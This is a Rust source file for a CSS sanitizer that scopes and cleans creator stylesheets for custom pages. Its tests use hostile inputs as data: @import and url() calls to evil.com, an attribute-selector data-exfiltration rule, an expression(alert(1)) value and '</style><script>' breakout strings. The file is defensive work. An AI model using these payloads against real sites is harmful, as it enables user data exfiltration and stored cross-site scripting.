//! CSS sanitization for custom pages, built on [`lightningcss`].
//!
//! The job is to take creator CSS and make it safe to inline on a public page
//! without it escaping the user canvas or reaching off-platform. The pipeline:
//!
//! 1. **Parse** the creator's CSS to an AST (nesting enabled, error-recovery on
//!    so one bad rule doesn't discard the sheet).
//! 2. **Visit** it once to: drop at-rules outside the allowlist, validate every
//!    `url()` (off-platform URLs are neutralized), strip system-slot hiding
//!    properties on `.mnw-*` selectors, enforce the strobe budget, flag
//!    `expression()`, and count rules/selectors against the DoS caps.
//! 3. **Scope** by partitioning rules into ones that select elements (style,
//!    `@media`, `@supports`, `@layer` blocks) and ones that are global by nature
//!    (`@keyframes`, `@font-face`, `@page`, `@layer` statements). The former are
//!    re-emitted nested inside `.user-canvas#uc-{owner}` and flattened by
//!    lightningcss, so scoping is done by the engine's own spec-compliant
//!    nesting resolver rather than fragile string surgery. Selectors that try to
//!    escape (`html`, `body`, `:root`, `*`) become `.user-canvas html` etc. and
//!    match nothing outside the canvas.
//! 4. **Append** a reduced-motion override as the final rule.
//!
//! The parse -> print -> wrap -> reparse round-trip is also what makes brace
//! injection impossible: a stray `}` in creator input is a parse error, never a
//! literal that could close the wrapper early.

use std::convert::Infallible;

use lightningcss::declaration::DeclarationBlock;
use lightningcss::properties::Property;
use lightningcss::properties::custom::Function;
use lightningcss::rules::{CssRule, CssRuleList};
use lightningcss::selector::{Component, Selector, SelectorList};
use lightningcss::stylesheet::{ParserFlags, ParserOptions, PrinterOptions, StyleSheet};
use lightningcss::targets::{Features, Targets};
use lightningcss::values::url::Url;
use lightningcss::visit_types;
use lightningcss::visitor::{Visit, VisitTypes, Visitor};

use super::url_filter::{UrlPolicy, resolve_internal_url};
use super::{MAX_RULES, MAX_SELECTORS, Rejection, RejectionKind};

/// Sanitize creator CSS for a profile or project page, scoping it to
/// `.user-canvas#uc-{scope_id}`. See [`scope_and_sanitize`].
pub fn sanitize_css(input: &str, scope_id: &str, policy: &UrlPolicy) -> (String, Vec<Rejection>) {
    scope_and_sanitize(input, "user-canvas", "uc", scope_id, policy)
}

/// Sanitize a project's CSS for one of its item pages, scoping it to
/// `.item-canvas#ic-{project_id}`. Item pages have no HTML of their own; they
/// wear the parent project's styling re-scoped to the item canvas root.
pub fn sanitize_item_css(input: &str, project_id: &str, policy: &UrlPolicy) -> (String, Vec<Rejection>) {
    scope_and_sanitize(input, "item-canvas", "ic", project_id, policy)
}

/// Sanitize creator CSS, scoping it to `.{canvas_class}#{id_prefix}-{scope_id}`.
///
/// `scope_id` must be an id-safe token (the owner/project UUID); anything else
/// is refused outright. `canvas_class`/`id_prefix` are internal constants.
/// Returns the sanitized, scoped stylesheet plus every reference stripped along
/// the way. On a fatal parse failure or a complexity-cap breach, returns empty
/// CSS and a single explanatory rejection -- a page that can't be made safe
/// renders as the platform default, never partially.
fn scope_and_sanitize(
    input: &str,
    canvas_class: &str,
    id_prefix: &str,
    scope_id: &str,
    policy: &UrlPolicy,
) -> (String, Vec<Rejection>) {
    if input.trim().is_empty() {
        return (String::new(), Vec::new());
    }

    if !is_id_safe(scope_id) {
        return (
            String::new(),
            vec![Rejection {
                kind: RejectionKind::MalformedCss,
                location: "css".into(),
                original_value: scope_id.to_string(),
                reason: "internal: unsafe owner scope".into(),
            }],
        );
    }

    let mut stylesheet = match StyleSheet::parse(input, parser_options()) {
        Ok(s) => s,
        Err(_) => {
            return (
                String::new(),
                vec![Rejection {
                    kind: RejectionKind::MalformedCss,
                    location: "css".into(),
                    original_value: String::new(),
                    reason: "CSS could not be parsed".into(),
                }],
            );
        }
    };

    let mut sanitizer = CssSanitizer {
        policy,
        rejections: Vec::new(),
        rule_count: 0,
        selector_count: 0,
    };
    // Our visitor never returns Err.
    let _: Result<(), Infallible> = stylesheet.visit(&mut sanitizer);

    if sanitizer.rule_count > MAX_RULES || sanitizer.selector_count > MAX_SELECTORS {
        return (
            String::new(),
            vec![Rejection {
                kind: RejectionKind::ComplexityLimit,
                location: "css".into(),
                original_value: format!(
                    "{} rules, {} selectors",
                    sanitizer.rule_count, sanitizer.selector_count
                ),
                reason: format!("stylesheet too complex (limit {MAX_RULES} rules, {MAX_SELECTORS} selectors)"),
            }],
        );
    }

    let mut rejections = sanitizer.rejections;

    // Partition surviving rules: element-selecting rules get scoped; rules that
    // are global by nature stay top-level (they have no document selectors, and
    // they cannot legally nest inside a style rule anyway).
    let rules = std::mem::take(&mut stylesheet.rules.0);
    let mut global = Vec::new();
    let mut scopable = Vec::new();
    for rule in rules {
        match rule {
            CssRule::Ignored => {}
            CssRule::Keyframes(_)
            | CssRule::FontFace(_)
            | CssRule::Page(_)
            | CssRule::LayerStatement(_) => global.push(rule),
            _ => scopable.push(rule),
        }
    }

    let scope_selector = format!(".{canvas_class}#{id_prefix}-{scope_id}");

    let global_css = print_rules(global);
    let scopable_css = print_rules(scopable);

    // Wrap the element-selecting rules in the canvas selector and let
    // lightningcss flatten the nesting (scoping done by the engine).
    let flat_scoped = if scopable_css.trim().is_empty() {
        String::new()
    } else {
        let wrapped = format!("{scope_selector} {{\n{scopable_css}\n}}");
        match StyleSheet::parse(&wrapped, parser_options()) {
            Ok(sheet) => sheet
                .to_css(PrinterOptions {
                    targets: Targets {
                        browsers: None,
                        include: Features::Nesting,
                        exclude: Features::empty(),
                    },
                    ..Default::default()
                })
                .map(|r| r.code)
                .unwrap_or_default(),
            Err(_) => {
                // Should not happen on already-sanitized input; fail safe.
                rejections.push(Rejection {
                    kind: RejectionKind::MalformedCss,
                    location: "css".into(),
                    original_value: String::new(),
                    reason: "internal: re-scope failed".into(),
                });
                String::new()
            }
        }
    };

    // Reduced-motion override, always last (decision #3). Scoped to the canvas.
    let reduced_motion = format!(
        "@media (prefers-reduced-motion: reduce){{{sel},{sel} *{{animation:none!important;transition:none!important}}}}",
        sel = scope_selector
    );

    let mut out = String::new();
    if !global_css.trim().is_empty() {
        out.push_str(global_css.trim());
        out.push('\n');
    }
    if !flat_scoped.trim().is_empty() {
        out.push_str(flat_scoped.trim());
        out.push('\n');
    }
    out.push_str(&reduced_motion);

    (escape_lt_for_style_element(&out), rejections)
}

/// Make the sheet safe to inline raw inside an HTML `<style>` element.
///
/// `<style>` is a raw-text element: the HTML tokenizer ends it at the first
/// `</style` regardless of CSS syntax, so a creator's `content: "</style>..."`
/// would otherwise break out and inject markup. lightningcss faithfully
/// preserves the literal `<` inside CSS string tokens, so we escape every `<`
/// in the final output to its CSS hex escape `\3c ` (the trailing space
/// terminates the hex digits). `<` is not valid CSS syntax outside string/url
/// tokens, so this rewrite is lossless where it matters and never produces a
/// literal `<` for the HTML parser to act on. `</style>`, `<!--`, and `<script`
/// all require a `<`, so neutralizing it closes the whole class.
fn escape_lt_for_style_element(css: &str) -> String {
    if !css.contains('<') {
        return css.to_string();
    }
    css.replace('<', "\\3c ")
}

fn parser_options<'o, 'i>() -> ParserOptions<'o, 'i> {
    ParserOptions {
        // Nesting is standard CSS; let creators use it and let us wrap with it.
        flags: ParserFlags::NESTING,
        // One malformed rule shouldn't discard the whole sheet.
        error_recovery: true,
        ..Default::default()
    }
}

/// Print a set of rules to CSS (non-minified, no nesting transform).
fn print_rules(rules: Vec<CssRule<'_>>) -> String {
    if rules.is_empty() {
        return String::new();
    }
    let sheet = StyleSheet::new(Vec::new(), CssRuleList(rules), ParserOptions::default());
    sheet.to_css(PrinterOptions::default()).map(|r| r.code).unwrap_or_default()
}

/// An id token safe to embed in a CSS id selector: ASCII alphanumerics and `-`.
fn is_id_safe(s: &str) -> bool {
    !s.is_empty() && s.bytes().all(|b| b.is_ascii_alphanumeric() || b == b'-')
}

/// The single-pass AST sanitizer.
struct CssSanitizer<'p> {
    policy: &'p UrlPolicy,
    rejections: Vec<Rejection>,
    rule_count: usize,
    selector_count: usize,
}

impl<'i, 'p> Visitor<'i> for CssSanitizer<'p> {
    type Error = Infallible;

    fn visit_types(&self) -> VisitTypes {
        visit_types!(RULES | URLS | FUNCTIONS)
    }

    fn visit_rule(&mut self, rule: &mut CssRule<'i>) -> Result<(), Self::Error> {
        self.rule_count += 1;

        // At-rule allowlist. Anything not explicitly allowed is replaced with
        // CssRule::Ignored (prints nothing) and recorded. Allowed at-rules fall
        // through to the recursion below so their contents are still cleaned.
        let blocked_name: Option<&str> = match rule {
            CssRule::Import(_) => Some("@import"),
            CssRule::Namespace(_) => Some("@namespace"),
            CssRule::MozDocument(_) => Some("@-moz-document"),
            CssRule::CustomMedia(_) => Some("@custom-media"),
            CssRule::Property(_) => Some("@property"),
            CssRule::Viewport(_) => Some("@viewport"),
            CssRule::CounterStyle(_) => Some("@counter-style"),
            CssRule::FontPaletteValues(_) => Some("@font-palette-values"),
            CssRule::FontFeatureValues(_) => Some("@font-feature-values"),
            CssRule::Container(_) => Some("@container"),
            CssRule::Scope(_) => Some("@scope"),
            CssRule::StartingStyle(_) => Some("@starting-style"),
            CssRule::ViewTransition(_) => Some("@view-transition"),
            CssRule::Unknown(_) => Some("unknown at-rule"),
            _ => None,
        };

        if let Some(name) = blocked_name {
            self.rejections.push(Rejection {
                kind: RejectionKind::BlockedAtRule,
                location: name.to_string(),
                original_value: name.to_string(),
                reason: format!("{name} is not allowed in custom pages"),
            });
            *rule = CssRule::Ignored;
            return Ok(());
        }

        // Style-rule-specific cleanups, with selector context in hand.
        if let CssRule::Style(style) = rule {
            self.selector_count += style.selectors.0.len();
            if selectors_target_system_slot(&style.selectors) {
                strip_hiding_properties(&mut style.declarations, &mut self.rejections);
            }
            enforce_animation_budget(&mut style.declarations, &mut self.rejections);
        }

        // Recurse into declarations (url()/expression()) and nested rules.
        rule.visit_children(self)
    }

    fn visit_url(&mut self, url: &mut Url<'i>) -> Result<(), Self::Error> {
        if let Err(rejection) = resolve_internal_url(&url.url, self.policy, "css url()") {
            self.rejections.push(rejection);
            // Neutralize: an empty url() resolves to the current document
            // (same-origin), never the off-platform target.
            url.url = "".into();
        }
        Ok(())
    }

    fn visit_function(&mut self, function: &mut Function<'i>) -> Result<(), Self::Error> {
        // expression() is dead in every browser we support; record it so the
        // creator sees why it's gone, and recurse for any url() inside it.
        if function.name.as_ref().eq_ignore_ascii_case("expression") {
            self.rejections.push(Rejection {
                kind: RejectionKind::BlockedFunction,
                location: "css".into(),
                original_value: "expression()".into(),
                reason: "the expression() function is not allowed".into(),
            });
        }
        function.visit_children(self)
    }
}

/// True if any selector in the list targets a `.mnw-*` system-slot class
/// (directly or inside `:is()`/`:where()`/`:not()`/`:has()`).
fn selectors_target_system_slot(list: &SelectorList) -> bool {
    list.0.iter().any(selector_has_system_class)
}

fn selector_has_system_class(selector: &Selector) -> bool {
    selector.iter_raw_match_order().any(component_has_system_class)
}

fn component_has_system_class(component: &Component) -> bool {
    match component {
        Component::Class(ident) => ident.0.starts_with("mnw-"),
        Component::Is(list)
        | Component::Where(list)
        | Component::Negation(list)
        | Component::Has(list) => list.iter().any(selector_has_system_class),
        Component::Any(_, list) => list.iter().any(selector_has_system_class),
        Component::Host(Some(inner)) => selector_has_system_class(inner),
        _ => false,
    }
}

/// Remove declarations that would hide a system slot, preserving the rest of
/// the rule. Records one rejection per dropped property.
fn strip_hiding_properties(decls: &mut DeclarationBlock, rejections: &mut Vec<Rejection>) {
    for list in [&mut decls.declarations, &mut decls.important_declarations] {
        list.retain(|prop| {
            if is_hiding_property(prop) {
                rejections.push(Rejection {
                    kind: RejectionKind::HidingProperty,
                    location: ".mnw-* rule".into(),
                    original_value: prop_string(prop),
                    reason: "system slots (.mnw-*) cannot be hidden".into(),
                });
                false
            } else {
                true
            }
        });
    }
}

/// Whether a property+value combination hides an element. Matched against the
/// serialized declaration so we don't have to enumerate every typed variant.
fn is_hiding_property(prop: &Property) -> bool {
    let norm = normalize(&prop_string(prop));
    if let Some(rest) = norm.strip_prefix("opacity:") {
        return rest.parse::<f32>().map(|v| v < 0.1).unwrap_or(false);
    }
    matches!(
        norm.as_str(),
        "display:none"
            | "visibility:hidden"
            | "visibility:collapse"
            | "pointer-events:none"
            | "width:0"
            | "width:0px"
            | "height:0"
            | "height:0px"
    ) || (norm.starts_with("transform:") && norm.contains("scale(0)"))
}

/// Drop infinite animations faster than 2s (strobe guard, decision #3). The
/// reduced-motion override handles accessibility; this caps the worst abuse for
/// everyone else.
fn enforce_animation_budget(decls: &mut DeclarationBlock, rejections: &mut Vec<Rejection>) {
    let mut has_infinite = false;
    let mut min_duration: Option<f32> = None;

    for list in [&decls.declarations, &decls.important_declarations] {
        for prop in list {
            // Lowercased but whitespace-preserved: duration tokens like `1s`
            // must stay split from neighbouring keywords.
            let raw = prop_string(prop).to_ascii_lowercase();
            if raw.contains("infinite") {
                has_infinite = true;
            }
            if let Some(rest) = raw.strip_prefix("animation-duration:") {
                update_min_duration(rest, &mut min_duration);
            } else if let Some(rest) = raw.strip_prefix("animation:") {
                update_min_duration(rest, &mut min_duration);
            }
        }
    }

    let strobe = has_infinite && min_duration.map(|d| d < 2.0).unwrap_or(false);
    if !strobe {
        return;
    }

    let mut dropped = false;
    for list in [&mut decls.declarations, &mut decls.important_declarations] {
        list.retain(|prop| {
            let norm = normalize(&prop_string(prop));
            if norm.starts_with("animation") {
                dropped = true;
                false
            } else {
                true
            }
        });
    }
    if dropped {
        rejections.push(Rejection {
            kind: RejectionKind::AnimationBudget,
            location: "animation".into(),
            original_value: "infinite animation under 2s".into(),
            reason: "fast infinite animations are not allowed (strobe guard)".into(),
        });
    }
}

fn update_min_duration(value: &str, min: &mut Option<f32>) {
    for token in value.split([' ', ',']) {
        if let Some(secs) = parse_seconds(token) {
            *min = Some(min.map_or(secs, |m| m.min(secs)));
        }
    }
}

/// Parse a CSS time token to seconds. Returns None for non-time tokens.
fn parse_seconds(token: &str) -> Option<f32> {
    let t = token.trim();
    if let Some(ms) = t.strip_suffix("ms") {
        ms.parse::<f32>().ok().map(|v| v / 1000.0)
    } else if let Some(s) = t.strip_suffix('s') {
        s.parse::<f32>().ok()
    } else {
        None
    }
}

fn prop_string(prop: &Property) -> String {
    prop.to_css_string(false, PrinterOptions::default()).unwrap_or_default()
}

/// Lowercase and strip ASCII whitespace, for value matching.
fn normalize(s: &str) -> String {
    s.chars().filter(|c| !c.is_whitespace()).collect::<String>().to_ascii_lowercase()
}

#[cfg(test)]
mod tests {
    use super::*;

    const SCOPE: &str = "11111111-1111-1111-1111-111111111111";

    fn policy() -> UrlPolicy {
        UrlPolicy::new(
            "https://u.makenot.work/alice/proj",
            ["makenot.work".to_string(), "u.makenot.work".to_string(), "cdn.makenot.work".to_string()],
        )
        .unwrap()
    }

    fn san(css: &str) -> (String, Vec<Rejection>) {
        sanitize_css(css, SCOPE, &policy())
    }

    fn scoped(css: &str) -> String {
        san(css).0
    }

    #[test]
    fn empty_input_is_empty() {
        assert_eq!(san("").0, "");
        assert_eq!(san("   ").0, "");
    }

    #[test]
    fn scopes_plain_selectors() {
        let out = scoped("p { color: red }");
        assert!(out.contains(".user-canvas#uc-11111111-1111-1111-1111-111111111111 p"));
    }

    #[test]
    fn neutralizes_body_and_root_escape() {
        let out = scoped("body { background: blue } :root { color: green }");
        // Both are confined under the canvas (descendant), matching nothing outside.
        assert!(out.contains(".user-canvas#uc-11111111-1111-1111-1111-111111111111 body"));
        assert!(!out.contains("\nbody"));
        assert!(!out.starts_with("body"));
    }

    #[test]
    fn rejects_import() {
        let (out, rej) = san("@import url(https://evil.com/x.css); p { color: red }");
        assert!(!out.contains("@import"));
        assert!(!out.contains("evil.com"));
        assert!(rej.iter().any(|r| r.kind == RejectionKind::BlockedAtRule));
        assert!(out.contains("color"));
    }

    #[test]
    fn rejects_namespace_and_moz_document() {
        let (out, rej) = san("@namespace url(http://x); @-moz-document url-prefix() { p {color:red} }");
        assert!(!out.to_lowercase().contains("namespace"));
        assert!(!out.to_lowercase().contains("moz-document"));
        assert!(rej.iter().filter(|r| r.kind == RejectionKind::BlockedAtRule).count() >= 2);
    }

    #[test]
    fn allows_media_and_keyframes_and_fontface() {
        let out = scoped(
            "@media (min-width: 600px) { .wide { color: red } } \
             @keyframes spin { from {opacity:0} to {opacity:1} }",
        );
        assert!(out.contains("@media"));
        assert!(out.contains("@keyframes"));
        // The media rule's inner selector is scoped...
        assert!(out.contains(".user-canvas#uc-11111111-1111-1111-1111-111111111111 .wide"));
        // ...but @keyframes stays global (not nested under the canvas).
        assert!(out.contains("@keyframes spin"));
    }

    #[test]
    fn external_url_in_background_is_neutralized() {
        let (out, rej) = san(".x { background: url(https://evil.com/y.png) }");
        assert!(!out.contains("evil.com"));
        assert!(rej.iter().any(|r| r.kind == RejectionKind::ExternalUrl));
    }

    #[test]
    fn internal_and_relative_urls_kept() {
        let out = scoped(".a{background:url(/static/p.png)} .b{background:url(https://cdn.makenot.work/x)}");
        assert!(out.contains("/static/p.png"));
        assert!(out.contains("cdn.makenot.work/x"));
    }

    #[test]
    fn attribute_selector_exfiltration_blocked() {
        // The classic CSS data-exfiltration trick: url() must be dropped.
        let (out, _) = san("input[value^=\"a\"] { background: url(//evil.com/a) }");
        assert!(!out.contains("evil.com"));
    }

    #[test]
    fn mnw_hiding_properties_stripped() {
        let (out, rej) = san(".mnw-buy { display: none; color: red }");
        assert!(!normalize(&out).contains("display:none"));
        assert!(out.contains("color"));
        assert!(rej.iter().any(|r| r.kind == RejectionKind::HidingProperty));
    }

    #[test]
    fn mnw_hiding_via_has_stripped() {
        let (_out, rej) = san("*:has(.mnw-files) { opacity: 0 }");
        assert!(rej.iter().any(|r| r.kind == RejectionKind::HidingProperty));
    }

    #[test]
    fn non_mnw_hiding_is_allowed() {
        let (out, rej) = san(".myclass { display: none }");
        assert!(normalize(&out).contains("display:none"));
        assert!(!rej.iter().any(|r| r.kind == RejectionKind::HidingProperty));
    }

    #[test]
    fn reduced_motion_appended() {
        let out = scoped("p { color: red }");
        assert!(out.contains("prefers-reduced-motion"));
        assert!(out.trim_end().ends_with("}"));
    }

    #[test]
    fn fast_infinite_animation_dropped() {
        let (out, rej) = san(".spin { animation: spin 1s infinite }");
        assert!(!normalize(&out).contains("animation:spin"));
        assert!(rej.iter().any(|r| r.kind == RejectionKind::AnimationBudget));
    }

    #[test]
    fn slow_infinite_animation_kept() {
        let (out, rej) = san(".spin { animation: spin 3s infinite }");
        assert!(out.to_lowercase().contains("animation"));
        assert!(!rej.iter().any(|r| r.kind == RejectionKind::AnimationBudget));
    }

    #[test]
    fn expression_function_recorded() {
        let (_out, rej) = san(".x { width: expression(alert(1)) }");
        assert!(rej.iter().any(|r| r.kind == RejectionKind::BlockedFunction));
    }

    #[test]
    fn brace_injection_cannot_escape_scope() {
        // A creator trying to break out of the wrapper: the parse round-trip
        // makes the stray brace a no-op, so nothing lands unscoped.
        let out = scoped("color: red } body { background: red");
        assert!(!out.contains("\nbody {"));
        assert!(!out.contains("} body{"));
    }

    #[test]
    fn idempotent_on_sanitized_output() {
        let once = scoped("p{color:red} .mnw-buy{display:none} .x{background:url(https://evil.com/y)}");
        let twice = scoped(&once);
        // Scoping a second time nests under the canvas again but must stay safe:
        // no external host, no display:none on mnw, reduced-motion present.
        assert!(!twice.contains("evil.com"));
        assert!(twice.contains("prefers-reduced-motion"));
    }

    #[test]
    fn unsafe_scope_refused() {
        let (out, rej) = sanitize_css("p{color:red}", "evil}injection", &policy());
        assert_eq!(out, "");
        assert_eq!(rej.len(), 1);
        assert_eq!(rej[0].kind, RejectionKind::MalformedCss);
    }

    /// Minify sanitized output so each rule is `selector{decls}` on no
    /// whitespace, for invariant checks.
    fn minify(css: &str) -> String {
        StyleSheet::parse(css, parser_options())
            .unwrap()
            .to_css(PrinterOptions { minify: true, ..Default::default() })
            .unwrap()
            .code
    }

    #[test]
    fn universal_and_not_selectors_are_scoped() {
        // Selectors that classically escape a scope must all end up confined to
        // the canvas: no rule may begin with a bare html/body/* selector.
        for css in [
            "* { color: red }",
            ":not(.x) { color: red }",
            "html, body { color: red }",
            ":root { color: red }",
        ] {
            let out = minify(&scoped(css));
            for bad in ["}*{", "}body{", "}html{", "}:root{"] {
                assert!(!out.contains(bad), "unscoped `{bad}` in: {out}");
            }
            for bad in ["^*{", "^body{", "^html{"] {
                let lead = bad.trim_start_matches('^');
                assert!(!out.starts_with(lead), "leads with unscoped `{lead}`: {out}");
            }
            assert!(out.contains(".user-canvas#uc-"), "scope missing: {out}");
        }
    }

    #[test]
    fn media_wrapped_escape_is_scoped() {
        let out = scoped("@media screen { body { background: red } }");
        assert!(out.contains(".user-canvas#uc-11111111-1111-1111-1111-111111111111 body"));
    }

    #[test]
    fn style_tag_breakout_via_content_string_is_neutralized() {
        // The sanitized output is injected raw into `<style>{{ css|safe }}</style>`
        // (templates/custom/*.html). The most direct stored-XSS attempt is a
        // declaration whose value is a string closing the tag and opening a
        // script. The serializer must never emit a literal `</style>` (or a bare
        // `<script>`) — `<` inside a CSS string token has to come back escaped.
        for css in [
            r#".x { content: "</style><script>alert(1)</script>" }"#,
            r#".x::before { content: '</STYLE><SCRIPT>alert(1)</SCRIPT>' }"#,
            r#".x { content: "\3c /style\3e <script>" }"#,
            // url() is dropped (external) but the string form must also be safe.
            r#".x { background: url("</style><script>x</script>") }"#,
        ] {
            let out = scoped(css);
            let lower = out.to_lowercase();
            assert!(
                !lower.contains("</style>"),
                "literal </style> escaped the block for input `{css}`: {out}"
            );
            assert!(
                !lower.contains("<script>"),
                "literal <script> escaped the block for input `{css}`: {out}"
            );
        }
    }
}

#[cfg(test)]
mod proptests {
    use super::*;
    use proptest::prelude::*;

    const SCOPE: &str = "22222222-2222-2222-2222-222222222222";

    fn policy() -> UrlPolicy {
        UrlPolicy::new(
            "https://u.makenot.work/a/p",
            ["makenot.work".to_string(), "u.makenot.work".to_string(), "cdn.makenot.work".to_string()],
        )
        .unwrap()
    }

    proptest! {
        // Arbitrary input never panics, and the output is always valid CSS
        // (it re-parses cleanly).
        #[test]
        fn never_panics_output_reparses(input in "\\PC{0,400}") {
            let (out, _rej) = sanitize_css(&input, SCOPE, &policy());
            prop_assert!(StyleSheet::parse(&out, parser_options()).is_ok(), "invalid output: {out}");
        }

        // A randomly-built external url() is always neutralized.
        #[test]
        fn external_url_always_stripped(host in "[a-z]{3,10}", tld in "(com|net|io|xyz)", path in "[a-z0-9]{1,10}") {
            let domain = format!("{host}.{tld}");
            let css = format!(".x {{ background: url(https://{domain}/{path}) }}");
            let out = sanitize_css(&css, SCOPE, &policy()).0;
            let leaked = out.contains(&domain);
            prop_assert!(!leaked, "leaked host: {}", out);
        }

        // Every non-empty sanitized sheet confines its style rules to the canvas
        // and ends with the reduced-motion guard.
        #[test]
        fn always_scoped_and_guarded(sel in "[a-z][a-z0-9]{0,8}", prop in "(color|background-color|margin)") {
            let css = format!("{sel} {{ {prop}: inherit }}");
            let out = sanitize_css(&css, SCOPE, &policy()).0;
            let scope_tag = format!("uc-{SCOPE}");
            let has_scope = out.contains(&scope_tag);
            let has_guard = out.contains("prefers-reduced-motion");
            prop_assert!(has_scope, "missing scope: {}", out);
            prop_assert!(has_guard, "missing guard: {}", out);
        }
    }
}